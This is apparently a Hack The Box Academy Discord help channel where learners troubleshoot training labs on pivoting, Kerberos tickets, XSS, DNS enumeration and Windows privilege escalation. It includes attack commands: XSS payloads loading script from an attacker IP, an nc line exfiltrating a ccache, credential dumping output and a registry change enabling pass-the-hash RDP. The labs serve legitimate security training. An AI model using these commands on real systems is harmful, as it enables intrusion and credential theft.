#modules
Yeah, have seen it happen on an internal. Definitely not something likely to find but I have seen it irl
ok hold on
it's a misconfig
Anyway, I have to upload a reverse shell and when I try to upload the file or modify the request in repeater, it does not allow me to do so.
yes it doesn't, that would be too easy, wouldn't it?
I mean, finding an api key in a repo, yes, but just having the ability to register doesn't really seem like a vuln
I mean... But I'm following exactly the same steps as the official solution, what would be the point if it didn't work?
by “the official solution” I’m assuming you’re talking about the examples?
it’s not plug and play
news flash
No, there is literally a button that says "show solution" that shows you how to solve the exercise, I do exactly the same thing, but it still doesn't work
Should I just report it as info with 0 CVSS score?
depends on how severe it is
reread this solution, sometimes solutions like these have hidden steps or very subtle changes that you might have missed
I don't remember exactly what it was but there was something that led us to another vuln. And in this case the ability to register gave access to private internal repos so it leaked internal source code
if you can register an account and get access to sensitive information, that would probably get a higher CVSS score than registering and getting access to nothing sensitive
hi can u pls help me?
no, i have no notes or recollection of the module + section you're doing
Okay, I'll read the solution again and try again several times, if it doesn't work, can I send you a DM?
yes
Thanks!
okay, np
yes
Can you find the port and type of mail server (smtp, pop3) for this mail server "mail.notismail.com"
How would I find it because this is something I need to replicate
what module is this?
an email module forgot exact one
is the session security module actually useful for the CBBH exam as it seems more informational than anything
Okay I got the answer to #Attacking Common Services, DNS. And should have gotten it way sooner.
Thanks for the assistance and advice, dns zone transfers are always a little tricky
How to write in offtopik?
wanna give a huge thank you and shoutout to @safe star for helping me with this module...couldnt have done it without ur thoughtful and considerable time
Honestly this connection issue is so annoying, making academy unusable rn
the vpn spits this out as well
looks like the network is unreachable
Yeah, thanks
you're welcome buddy
If anyone can actually help then feel free to respond here or dm, but I feel like it's def a platform issue
Did you try downloading a new vpn file?
Yeah, and switching servers
Has anyone here completed the attacking common services module without guidance? It might just be a skill issue but this module seems unreasonably difficult. It assumes you will searchsploit coreftp without knowing the version, then it assumes you will try a directory traversal despite not covering this material prior to the module. This is in addition to creating a webshell which shouldn't be exceedingly difficult but prior to this module it maybe comes up once :/ Am I dumb?
Having VPN issues too myself, so seems like it's not an isolated incident. Literally been stuck on "Target(s) are spawning" for the past 5 minutes and counting (Module: Linux Privesc § Capabilities)
that easy lab was def one of the harder skill assessments
I could use some advice for module#Footprinting, section DNS. I've tried to complete this module multiple times but I always get stuck. If anyone could please give me a suggestion in the right direction it would be greatly appreciated. I have submitted what command I'm currently running to enumerate DC1
||for i in $(cat /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt); do dig DC1.$i.inlanefreight.htb @ns.inlanefreight.htb | grep -vE ';|SOA' | sed -r '/^\s*$/d'; done||
that should've been swapped with the hard lab
you're not dumb
that's normal
it's just trying to simulate a real world scenario
Am I going in the right direction or should I instead try something else?
wouldn't it be better to just use a dns tool, then use a script to dig the subdomains found?
I was hoping that
I feel so demoralized lol but the grind continues😤
I thought I would try this route because I believed I had already discovered all the subdomains
But I'll go through again using a dns tool
Hii
https://academy.hackthebox.com/module/158/section/1437
Does anyone know which release of Chisel is the valid one for this module / section?
The target is throwing the following error with all the minor versions I am testing:
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
who knows hack please
wasn't this dude here earlier?
SOLVED.
v1.10.0
Instead of compiling the source code on my machine and sending it, I downloaded the .deb file, installed it, and sent the copy directly from /usr/bin/chisel.
" Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer. "
I only need help on the "use the cracked password of the user Kira and log into the host..." does it mean the password that was shown earlier in the section? because that doesn't work on ssh, along with the username. Am I missing something? or is it from a previous section and not in the protected files section at all?
you're missing something from a previous section
brutal
Hey guys, I'm on the module login brute force, section skill assessment 1. I need to brute force creds through web auth but after 20 minutes still nothing, can anybody help me?
hi, this is from Module: Pivoting, Tunneling
ubuntu@WEB01:~$ cd ptunnel-ng/
ubuntu@WEB01:~/ptunnel-ng$ cd src/
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.180.111 -R22
[sudo] password for ubuntu:
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory
I am creating an ICMP tunneling server using ptunnel-ng on the target host (Ubuntu) and I've transferred the repo files via scp.
How can I resolve this error?
install missing dependencies
maybe that's because the compromised machine doesn't have access to the internet?
Yeah, it doesn't. How can I get it to install them?
In such cases, I usually transfer the files via my attacker box to compromised machines, but I'm unsure for libraries
why not just do that
are you still stuck ?
Nvm, I just created a binary out of it and used it. Thanks anyways
Can someone double check my code for the InstallUtil section in the win av evasion module? I'm pretty sure it's right and the .txt says it passes all checks and is executing but got no shell
jup
then you might have the wrong username
It's not about that, I use the list they ask me to use
I used this but with -L top short username (the one provided for the assignment) and -P 2023….. doing the auth from / directory
I'm in AD Enumeration & Attacks > Assessment #1 and
||I've dumped the SAM database on a machine to discover there is a DefaultPassword. IIRC this indicates the system is set to login automatically, and to do this it caches the password cleartext. Why is the user unknown (see "Unknown User" below) though? I can't remember if this is typical output (I am looking for the right section to reference but no luck so far).
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):<redacted_cleartext_password_here>
[*] DPAPI_SYSTEM
||
Yeah I don't remember. I just used netexec to work the problem.
huh, ok, I'll play with that too. Thanks.
What are you dumping with?
Isn’t that the lsa?
No it's SAM and I used secretsdump.
I know the right answer but I see what R1cky's saying about just finding out using nxc if I didn't.
I just don't remember if we usually get a proper username in that scenario. I don't remember it looking like that before.
That’s how it is with mimikatz too
No username just password
I also just use netexec
Ok, thanks for the confirm.
Hey it's me back to complain again, does anyone know when support goes back online?
Probably in the morning.
I can compare your code to the one I got in my notes
Target machine for the Linux Privesc skills assessment is taking 10 minutes and counting to spawn — after the ||T****t M*****r|| crashed on the previous instance and left me with no service running. Any idea what's going on?
most likely a browser issue, ctrl+shift+r
It's more than that because I've got a webshell on the box now but my Netcat listener won't pick it up.
well no, you said the target wouldn't spawn. if you were able to connect then the target is spawned, so that's a totally separate issue.
Question for anyone taking Intro to Assembly, in the Procedures section, there is a question: " Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes)"
Why is it that the answer is not obtained by adding a breakpoint when entering the "exit" function and checking its rsp? I got the answer by copy pasting all the memory addresses of the binary itself but it feels a little bit underwhelming to have gotten my answer by doing that. I'd like to know someone's expert opinion please 🙏
strange
at the start of the exit func rsp should point to the ret addr
that call just pushed onto the stack
Ahhh you're right, I read up my command history and it's showing the answer, I probably copy pasted the wrong thing initially. Sorry about that 🙏
awesome
awesome sauce
I could use some help with "introduction to NoSQL Injection", I'm trying to bypass authentication of MangoMail but it says "please enter an email address" when I input the exploit code (which I assumed would surely work). I have tried all kinds of different code snippets but the result is the same.
Try it in the RDP session you might have. Not in your machine
Wdym?
You have an RDP session to a machine connected to the internal network
Once you have a session in a Host connected to the internal network you can use whatever this Host has
You don’t need to use it from your machine
There is one of the Hosts that has a VNC Client
Hello guys, can someone help me with the Information Gathering - Web Edition Skill Assessment
With this question:
*What is the API key in the hidden admin directory that you have discovered on the target system?*
I added the following line in my /etc/hosts file <ip> inlanefreight.htb. Then I try to use ffuf to enumerate the subdomains with ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://FUZZ.inlanefreight.htb:<port>" (also tried it with gobuster).
I do not get any results. Could someone explain what I am doing wrong here?
make sure to check the part where you do vhost fuzzing
if you only added the main domain, you will not get any results
Aaah I see now. Thanks for the tip!
good luck
any idea?
this is my command rn
for the login brute force module skill assignment 1
oh okay I get it rn ahaha
I'm doing the File Upload Attacks module in the Blacklist Filters section, and I'm stuck because I can upload a file in php8 but it changes it to <!--?php echo "Hello"; ?-->
Does anyone know why it changes it?
Can someone help me please
Not sure why, but you can try other extensions; not all the extensions will work with your target
hey guys I have a question about a module, can I get help here?
hey guys are we learning how to hack here ?
you came to the right place @harsh sundial
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@idle rampart 👆
so I was doing the linux fundamentals module
and all good and well but I got stuck on this question
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
So what part did you get stuck on
idk I wrote a couple of lines
they all gave me results but none seem to be working right
I asked AI for help but it couldn't get the right one either
AI is shit at getting it
ah okay sometimes I use it to give me hints
There's a forum answer that breaks down the commands and explains better
oh thanks can u link it to me ?
Google is free
it is the hack the box forum
Yes
alright thx
You can probably find it if you use the discord search function
yea no i got it thank you
Hi
hello
I cannot access Pwnbox for practice. Perhaps I already used it for 2h free. Is there anyway I can practice for free?
Stand up your own kali/parrot/whatever and use the VPN. It's way better that way anyway.
sir you replied to a bot
Here to learn the art of Pen Testing 
F
Hello, I'm doing AD Enumeration and attacks. I get an error when I issue the following command.
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
The issue is that my IP is in the 10.x.x.x range. How can I connect to reach a 172.x.x.x IP?
Is the port on proxychains.conf socks5 127.0.0.1 1080 the port Chisel is gonna listen to? Or should I just leave it on 1080?
Also, do I need to set the IP to my attacker machine?
you set the ip to match whatever machine chisel is hosted on
that line is for proxychains to know which proxy to connect to
noted on the IP. Do I also set the Port same as Port of Chisel listener?
What about the socks4? Can I keep both socks4 and socks5 on proxychains.conf or should I remove socks4 and keep only socks5?
Module: Pass the Ticket - Linux
https://academy.hackthebox.com/module/147/section/1657
Also, after establishing Proxychains and Chisel, how do I utilize it for file transfers? Do I still need to establish a server apart from the
(proxychains and chisel) on the host where the ccache is being held, or can I just utilize the proxychains and chisel themselves?
Pivot Host is the MS01 right? Because LINUX01 is only reachable through PORT22 by configuring the PORT2222 of the MS01. Right?
Bro pls explain. How do I utilize the proxychains and chisel once I have established the connection?
you can keep both if you have a reason for mixing
you can use a tool that respects the proxy for this
if LINUX01 is reachable through MS01 then yes it is the pivot host
Why can't I speak in general? I'm asking here because this is where I'm always redirected
Anyone for a nudge on the HTTP Attacks Skills Assessment? I can bypass the WAF, but cannot see anything on /mail if I attack SMTP. According to the instructions, the WAF is there to protect internal endpoints, but I cannot find which one.
#welcome brings all the answers for your quest on getting verified
go back to the first section, it explains how to connect. You attack from the provided jumpbox
Can I ping you 1:1?
ok
Hello, I'm working through Attacking Common Services, Attacking DNS and have hit a wall. I found three subdomains, ns, control, and helpdesk, but none of them are yielding new DNS records. I've tried using dig axfr, dig any on each with nothing to show. Also every time I run subbrute with the names.txt file I get a ProcessLookupError, which seems odd. Anyone got any ideas for me to try next?
any good alternatives to proxychains
I swear to god this thing works 1% of the time when it feels like it
thanks a lot!!!
Ligolo
Proxychains is clunky as heck but sometimes it's the only easy alternative
Hello everyone,
I am still on the Information Gathering - Web Edition skill assessment.
I am looking for the API key, could someone give me a clue on how to do it?
I already have the robots.txt and the hidden folders but no clue yet
on finding the API key
Module: Network Enumeration with Nmap
Section: Host and Port Scanning
Hey, I'm really struggling with the second task in this section:
Enumerate the hostname of your target and submit it as the answer. (case-sensitive)
I have tried -A / -sC -sV
and -O
-O -osscan-limit
I was just able to do it with -sC.
Module: Linux Priv Esc
Section: LXD
I have a running container with elevated privileges, now I want to establish an interactive shell into it, but my command throws an error, command not found.
lxc exec privesc /bin/bash
I'm not sure what command is not found, the lxc binary works just fine, I used it to make the image and container and stuff
or does that mean on the target container is no /bin/bash ?
||oh got it, there is no bash on alpine :/||
The Output is Empty.
what's your whole command?
reset target and try again
sudo nmap -Pn -sC 'Ip-target'
I will try
sure :d
preferably without the quotes ''
yeah of course bro without quotes
what happens if you take out the -Pn?
not running
saying try -Pn
what happens when you just ping it?
can't ping either, I have tried this before
terminate the target box and spawn a new one. you should at least be able to ping
I will try that
I think it's paying off
now I can ping the target 🤩
The Output guys 😒
is it normal?
Nmap scan report for 10.129.7.36
Host is up.
All 1000 scanned ports on 10.129.7.36 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 207.78 seconds
does it look normal to you?
I am currently working on Attacking Enterprise Networks module, section Lateral Movement. Trying to answer the last question, which is to obtain the NTLMv2 password hash for mpalledorous. The Inveigh module has been running for a while now, but there are no hashes. Am I missing something?
nah
Could someone please explain to me what the commands in the File Transfer In Linux With Bash mean?
I'm kinda lost. They're not quite like anything I've seen before; they look sort of odd.
what do you mean
it’s standard bash syntax
Anyone???
I mean it usually looks like nc -nv <TARGET IP ADDRESS> <PORT NUMBER> or rlogin <TARGET IP ADDRESS> -l <ACCOUNT NAME> or whatever. In the commands in the section I mentioned I have no idea what's going on. Like what's exec 3<> etc.
Linux PrivEsc, Section Logrotate
I am able to get logrotate triggered by changing a log file, I have my payload set up and my rev shell waiting to be called, but logrotten catches the rotation and does its thing, but won't establish a shell. I have no clue why it won't connect back to me, ip/ping is correct
Did you run it on the right machine?
In the labs the llmnr attacks are targeted so you can’t run responder on any machine to catch it
exec 3<> basically opens a file descriptor with the number 3 for both reading (<) and writing (>)
see not so strange now
you can do this exec 3<> file.txt
cat <&3 to receive input from file.txt
when you’re done with it you could close it exec 3>&-
i suggest you do the intro to bash scripting module before going any further
or don't, to be honest you don't need to and cannot possibly know every detail about everything
ignore that unless it’s something you can afford to skip 👆
yep, always up to each individual. I would not stop learning file transfer methods to go learn bash because I didn't understand a one-liner that I can use without understanding, but that's up to me
hence the "or don't"
if you don’t understand what every command does you risk leaving yourself vulnerable to problems you will not be able to solve
if that works
for you
I'm ok with that, but yeah, up to each one to decide. Just giving an alternative
yes
I am having issues with the Information Gathering - Web Edition Module Skills Assessment. I cannot, for the life of me, even ping inlanefreight.htb let alone do anything else with it like dig, dnsenum, etc. I added the IP with port and the inlanefreight.htb domain name to the /etc/hosts file, but it no workie. I tried without the port number, nothing. What am I missing?
I believe that's what I did when I dropped in the IP and domain (inlanefreight.htb) to the /etc/hosts file unless I did it incorrectly. I also tried modified with the port, no bueno.
for anyone who wants to know, everything was set up right, but for some reason it won't connect every time, and if it does, just for like 5 seconds, so gotta be fast for printing that flag xD
As admin?
Yes as an admin
With all the privs and everything?
Are you using the exe or ps1? Maybe try the exe if not
Yeah just do it fast
You could probably just do another reverse shell after that one
ended up creating a new admin for this. worked. thanks.
yeah, but now I'm finished with this Module, this logrotate was the hardest imo
May I ask how you fixed this?
You don't put the port in the /etc/hosts file, you do use the port when making requests to it
I.e. you'd visit http://inlanefreight.htb:port
Your hosts file will look like
ip inlanefreight.htb
Hi, I have exactly the same issue... were you able to solve it? I am going crazy after two days of research, still no answer how to solve this
Try with sudo
Guys I'm in ad enumeration and attacks - skill assessment part 1 - question 3
It's not about the question, I can't fucking import the active directory module
It keeps saying there's no file
I copied these files
Activedirectory.ps1
Activedirectory.psd1
Powerview.ps1
microsoft.activedirectory.management.dll
In the following directories
C:\windows\system32\windowspowershell\v1.0\modules
C:\windows\system32\windowspowershell\v1.0\modules\ActiveDirectory
C:\program files (x86)\windows powershell\modules
C:\program files (x86)\windows powershell\modules\ActiveDirectory
It keeps giving me error
Thanks for quick reply!
I tried:
sudo ssh -D 9050 ubuntu@10.129.29.209
netstat -antp | grep 9050
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN
tail -4 /etc/proxychains.conf
socks4 127.0.0.1 9050
sudo proxychains nmap -v -sT 172.16.5.19
Still not working...
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Try -Pn
but the problem is the solution shows that it could be possible without -Pn... I mean the nmap in the solution shows open ports, with -Pn I can achieve only filtered, and other apps don't want to work either e.g. proxychains firefox
edit: I think really sudo for ssh solved my problem... I'll retest on another lab and let you know, thanks!
lemme check
I am talking about this module: https://academy.hackthebox.com/module/163/section/1547 (Attacking Enterprise Networks Internal Information Gathering)
Why does the WINLPE-SRV01 desktop keep reloading every 2 minutes and interrupting File Explorer sessions in the process? Makes it nearly impossible to work with.
Does anyone else have trouble getting proxychains to work from time to time?
For me, sometimes proxychains will work, and sometimes it doesn't.
Yesterday and today, everything was working fine. Now all of a sudden I'm getting time out messages.
I didn't change a thing, I'm not doing anything different.
I've noticed in some forums how this is a common issue.
Try using this instead: https://youtu.be/qou7shRlX_s?si=8bpaZj5EO4L2u8WC
@safe star ?
yeah it's working for me
but the ip you used doesn't exist
I think there's some weird scheduled task running in the back
thank you for checking, it is driving me mad
yes, this IP does not exist there, I was doing the lab from the Pivoting & Tunneling module where it was introduced... anyway I will just try this Ligolo thing, I give up for now
thanks kennystrawnmusic
This is, as you can probably guess from the machine name, the Windows Privilege Escalation § Communication with Processes module I'm trying to work on only for this problem to rear its ugly head and interrupt my work.
yeah it was annoying but it's bearable
masterhu it'll be helpful if you specified the error
Hey I'm starting Introduction to Windows Evasion Techniques ...I spun up the pwnbox and set the command to RDP
you can see that it doesn't work as I don't have the IP address of EVASION-DEV
you can't ping EVASION-DEV for IP resolution...and dig doesn't return anything
wait I'm a moron
helps if you spin up the dev box first lol
Why is it that even after transferring julio's ccache to Pwnbox and setting it using export KRB5CCNAME=/root/<julio-ccache> (the path is correct, and I've also changed the permissions of the ccache using chmod 777 <julio-ccache>), when I do klist it still says "Unsupported credentials cache format version number"?
Module: Pass the Ticket (PtT) from Linux
upon checking the env var using env | grep -i krb5 it's properly set too
verify file format using file
it says "krb5cc_647401106_HRJDux: HTML document, ASCII text, with very long lines (365)"
is this right?
no
what should it be?
looks like it was turned into a html document during transfer
I just used curl -O to transfer it
ftp/scp default to ascii mode for file transfers btw
ok I'll try again using scp
well you grabbed a html doc
awesome
proxychains scp -o "ProxyJump david@inlanefreight.htb@linux01" svc_workstations@inlanefreight.htb@linux01:/tmp/krb5cc_647401106_HRJDux /home/htb-ac-1003645/transfer
Do you have anything better in mind to conduct file transfer once Chisel and Proxychains have been established?
why did you use proxychains for that?
because linux01 is unreachable externally and MS01 is the Pivot Host that has access to linux01. MS01 is reachable externally
if this is the case, why would the module teach you to set up the chisel and proxychains then?
```
Scenario
To practice and understand how we can abuse Kerberos from a Linux system, we have a computer (LINUX01) connected to the Domain Controller. This machine is only reachable through MS01. To access this machine over SSH, we can connect to MS01 via RDP and, from there, connect to the Linux machine using SSH from the Windows command line. Another option is to use a port forward. If you don't know how to do it, you can read the module Pivoting, Tunneling, and Port Forwarding. As an alternative, we created a port forward to simplify the interaction with LINUX01. By connecting to port TCP/2222 on MS01, we will gain access to port TCP/22 on LINUX01.
```
Based on how I understand it, the port 2222 on ms01 is configured in a way that when you connect to it via SSH, it'll connect you to Linux01's Port 22
Right?
back on this question, is there any simpler way to conduct file transfer once chisel and proxychains have been established?
scp?
Anyone know how to passcode crack
that is in the module password attacks
I haven't done that module
Can u try
I just used nc to connect back to me and transfer the file
no proxychains needed
why would I do that
I got scammed
contact support
You're gonna help me?
no
Bruhhh
why this happening to me
Is anyone able to help with "Misc CSRF Exploitation"? I got the client side redirect to work but when I tested it on my end the session cookie was not getting included in the redirection?
this wouldn't and didn't work mate. Pwnbox can't even ping the linux01 as it's not reachable externally.
scp svc_workstations@<IP>:/home/user/file.txt /local/directory/
Do I specify the IP of Linux01, where the ccache file will come from, or do I specify the MS01 IP?
thanks mate, you saved the day!
- scp svc_workstations@10.129.147.77:2222:/tmp/krb5cc_647401106_HRJDux /root
- scp svc_workstations@inlanefreight.htb@10.129.147.77:2222:/tmp/krb5cc_647401106_HRJDux /root
both are connection refused
I transferred the file to me tho?
svc_workstations doesn't own those files
it wouldn't work anyway
what are your steps? I can't.
use -P for port
I already switched to root and chmod 777 the ccache
Import-Module .\SeBackupPrivilegeUtils.dll
Operation is not supported
Looks like some outdated module content. Either that or how do I get PowerShell to recognize said files as valid for import?
linux01: nc -q 0 <my IP> <port> < krb.ccache
??
scp should work since you changed the privs, but i think a new ticket gets replaced at a certain interval
you're trying to import a binary module
is this what the module discussed?
because modules are basically .ps
the scp -P worked man. Thanks so much!
was able to transfer now the ccache without changing the file format of it
awesome
thanks to you too Mr
That's literally what Windows Privesc § Windows Built-In Groups says to do.
with that command?
powershell module != dll
I'm aware of that, but apparently whoever wrote the contents of the module isn't.
the instruction you're quoting probably involves loading a utility that enables that privilege
not sure, never had a problem with that
it can't mean just slap it onto import-module
now OBVIOUSLY the operation is not permitted
a quick google search says to load via add-type
The lesson seems to be very buggy.
Did you run any other commands before trying to import them?
no
Resetting the target worked. Mistake was trying to load another copy that wasn't the version already on the target.
I'm currently on the meterpreter tunneling and portforwarding section of the Pivoting, Tunneling, and Port Forwarding module. I had to step out before finishing the last question yesterday, but when I tried to do it today, I keep getting Segmentation fault (core dumped) when trying to execute the payload through ssh. Was not having this issue yesterday.. I've tried making a new payload and restarting the VM and I'm still getting the same error. Any ideas why?
if it worked yesterday then it has to be an issue with the payload and not the machine
right?
maybe need to respawn the target or wait longer for the environment to fully boot up
That's what I'd assume too but making a fresh payload for a respawned target that's been up for 12 minutes prior to me making an attempt led to the same error output
Hi guys, I'm trying to have a server on the Pivot Host using Chisel Reverse Pivot:
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
How can I resolve this?
This is the Pivoting module
use an older version of chisel
Alright, amazing, thanks!
probably something wrong with your subbrute command, are you using the resolvers.txt too?
Yep, I put the IP of the target in the resolvers.txt file
./subbrute.py -s names.txt -r resolvers.txt -p inlanefreight.htb
double check everything, your command, the files, make sure no spaces in the text files etc
Are you saying in regards to the ProcessLookupError?
yeah either that or maybe something wrong with your python
Okay
I'm running the command with verbose and it's checking properly, so far, I'm waiting to see where it dies
Checking: rainfield61.inlanefreight.htb
Checking: disneyandmore.inlanefreight.htb
Checking: yalla-tv.inlanefreight.htb
Checking: jquerybyexample.inlanefreight.htb
Checking: partylandportugal.inlanefreight.htb
Checking: iansnaturism2.inlanefreight.htb
awesome
Figured it out. I'd forgotten to set the appropriate payload in the msf listener😑
awesome
Oh, I should probably note the ProcessLookupError was coming up on the Pwnbox, not my personal machine. Should I report that to someone? I am 29000 subdomains in and no error yet on my personal machine
I feel like the module RDPOverSocks is not that well-written, and it lacks a diagram too to understand what's really happening.
I'm confused with what the target is here, what's the pivot host and what's the attacker host
your vm/pwnbox is the attacker host, the pivot box is the box you're tunneling your traffic through, and the target is the target you're trying to reach
Hey guys
Hello kid
I mean, the OS and IPs in that particular section SocksOverRdp
it's windows, generally rdp = windows and ssh = linux (but both can have either)
Not that,
I'm having a hard time understanding what's on 172.16.5.x and what's on 172.16.6.x
for this section:
https://academy.hackthebox.com/module/158/section/1439
And why are we transferring Proxifier to the Pivot this time?
You can read about it more here: https://www.proxifier.com/ -- it just redirects your traffic through a proxy
I know. But the last few sections that I read, we usually set up Proxifier on our attacker host. Here, we transferred it and set it up on Pivot. That's what confused me
A diagram would help
Does anybody know how to get free membership of a youtube channel?
i don't recall ever using proxifier on the attacker host. proxifier is a windows app.
this isn't the discord for that kind of stuff.
it's when the attacker host is Windows I mean
lol
Right. I think I get it a bit now
It’s gonna be full moon next week
i can tell you how to verify your account
I eat a KFC and later regret it.
You should verify your account 😅
Correspondence can tell you how
😉
This is the hardest lesson to learn.
hii
hiiiiiiiiiiii
hello
Kill the process using port 80 or use different port
I don't advise killing the process running on port 80 on the workstation
different port doesn't seem to be working
@rustic sage not the place
Oh
aw I was reading that
not in this discord server
Probably been asked before, but is it possible to reset module progress? I completed a module last year and would like to go through it again from fresh.
Nothing of that sort from the frontend afaik
probably a cool little project to make a small browser plugin to hide the answers
Can someone help me with the XSS Filter Bypass section of the Advanced XSS and CSRF Exploitation Module? I have found that the <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> can get an alert. However when I change the payload to the exploit server link and put my payload I don't seem to be getting anything on the exfiltrate.htb:PORT/log page. The hint says that you shouldn't put a port in the payload and I haven't but I can't seem to get it to work. Can someone help pls?
In Attacking Web Applications with Ffuf In the skills assessment, I'm trying to submit the answer and I'm pretty sure it's correct.
But it keeps saying Incorrect answer!
It's the question that says One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
Check the hint
I did
ABUSING HTTP MISCONFIGURATIONS SKILL ASSESSMENT HARD :
I was able to find the first vulnerability and exploit it to get access to another dashboard. But now I'm stuck on the second part where I have to input a code to proceed. I assume it's a Host Header Injection, which I tried several attacks. But I'm stuck. Anyone willing to give me a nudge?
BRUUH, I was just supposed to replace the actual port with the word PORT.
I mean I read the hint but It did not specify the answer should be like this.
follow the provided syntax
thank you.
Ignore. I figured it out. Used a different XSS payload
Hey guys I'm having trouble with Alert machine can someone help me please?
Yes no problem check dm 😉
If you can't access it - read #welcome
Oh I'm sorry
no problem 😄
Thanks bro 🙂
when users visit your profile they can respect you
Oh alright
For the active directory enumeration and attacks module
section of LLMNR/NBT-NS Poisoning - from Windows
The rdp access doesn't work
and when it works i get to have like a minute before i get kicked out of the windows machine
i have been struggling now with the same issue for an hour maybe because i can't answer the last question i'm thinking about skipping it now
I get this error whenever i try to access the machine via rdp
xfreerdp /v:10.129.122.19 /u:htb-student /p:Academy_student_AD!
[04:52:01:808] [6797:6798] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[04:52:01:809] [6797:6798] [ERROR][com.freerdp.core] - failed to connect to 10.129.122.19
Can you try with remmina or rdesktop ?
please help i stuck on https://academy.hackthebox.com/module/110/section/1051 question i'm trying 3 days please help
it is for todo list on dashboard
Do you guys know a good resource to learn Windows and Active Directory? I have 0 experience in that.
both have the same issue as well
Can you restart the target
Best to contact support then
i'll just skip it for now and maybe get back when i finish the whole module
because i already know how to answer and everything but its just buggy
have you tried reaching out to support?
no i haven't
how can i do that?
do i need to email them and something or just a quick chat box?
Need some help? Learn how to reach the support team on Academy.
https://academy.hackthebox.com/module/103/section/1008
how can i identify what type of injection i can use?
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
is there an automated tool to help with that? which checks which parameters are working? XSStrike is not working for the given test
When you don't have visibility to the source code, fuzzing the input with automated tools is the way to go
XSStrike mostly works for basic, but the more reliable way to go is to write your own script that works much better depending on the endpoint/application you are attacking
mhm okey thanks
What exactly are you having trouble with?
i made these and i placed
"><script src=http://192.168.29.249:8080/script.js></script>
but I'm not getting any response on my php server
can someone tell me what am i doing wrong
Hi everyone, I'm on Attacking Web Applications with Ffuf on the Skills Assessment - Web Fuzzing section and on the question:
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
I found the page but I don't know the expected format because it always tells me it's wrong but, I test on the pwnbox browser, it's the right page.
Can someone help me?
how are people supposed to help you when you arent sharing all the information?
Do you get any http requests made to your machine?
How is your php listener setup?
Do you even run http.server and php server at the same time?
- no i did not get any request
sudo php -S 0.0.0.0:8080 - http server? no i didn't, I'm trying to import the script from my VM to the XSS injection website
Make sure you understand what is going on.
Your xss payloads make a http request to your php server on port 8080, however you're supposed to make your xss go to your js then the js will call to your php
Setup python3 -m http.server on port 8000 in its own terminal
run your php server php -S 0.0.0.0:8080 in its own terminal on port 8080
Then send your xss payload to "><script src=http://192.168.29.249:8000/script.js></script>
xss -> port 8000 hosting your image that makes a request to your php server on port 8080
xss -> js -> php
Are you sure 192.168.29.249 is the VPN IP? @eager zinc
yes
i mean he is expecting a callback with no server
thanks i was able to get it
sweet
I solved thanks
With the Nmap enumeration medium lab "After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. " am I just formatting the answer wrong?
I have found the dns server on the UDP port and discovered what service is running (An open source DNS) but answer isn't accepted. Is my formatting just wrong?
someone can help me how to use codes in Plans?
use codes in what now?
annual plans's code
Ahh, you should be able to add a code in the checkout https://app.hackthebox.com/vip
This is not for Academy
Thank you
how to check vpn ip
oof that is why i was having trouble
i got it
Bruh the Academy Firewall and IDS/IPS Evasion - Medium Lab is broken it gives a different result to the same nmap command if you use your own machine rather than pwnbox
Not broken. Just a weird quirk
How is that not broken? It wasted an hour and a half of my time.
Now I'm wondering how many other labs are randomly not gonna work if I don't use pwnbox
I've only run into it like once or twice
VPN IP always starts with the tun0 interface, and tun1, tun2 if you connect more
You basically have to look up a reddit post that says the lab doesn't work on your own machine and you must use pwnbox. Would be useful to have that as a hint on the question to not waste people's time.
Kudos for helping him out, I am about to start XSS today so tips like these are invaluable.
Is there a place to report issues with pwnboxes? Yesterday I was working on Attacking Common Services, Attacking DNS and using subbrute with names.txt kept causing a ProcessLookupError exception
Hi, beginner here, I'm trying to connect to the mongodb server on the very easy box, I'm getting the error "bash: ./mongosh: cannot execute binary file: Exec format error", I'm guessing it's because the version the tutorial recommends doesn't work for my architecture, and I can't find where to download a different version, anyone got any advice for me?
It worked for me through the VPN, but that's an interesting observation that you get different results between the VPN and pwnbox.
I found the assessment to be quirky. I will admit that much.
My notes don't include much secret sauce but detail my observations about the lab. If you want to share what you were trying we could talk about it. DM's open or here is fine.
Now that I think about it, the lab is a little like Schrodinger's IDS.
figured it out, had to use docker because i have aarch64 architecture.
maybe a warning or something for this box could be warranted as it's "very easy", unless i did something wrong, idk
Try to connect via RDP using the Administrator hash. What is the name of the registry value that must be set to 0 for PTH over RDP to work? Change the registry key value and connect using the hash with RDP. Submit the name of the registry value name as the answer.
Password attack - Pass the Hash (PtH)
So guys, i need to enable restricted admin mode
c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
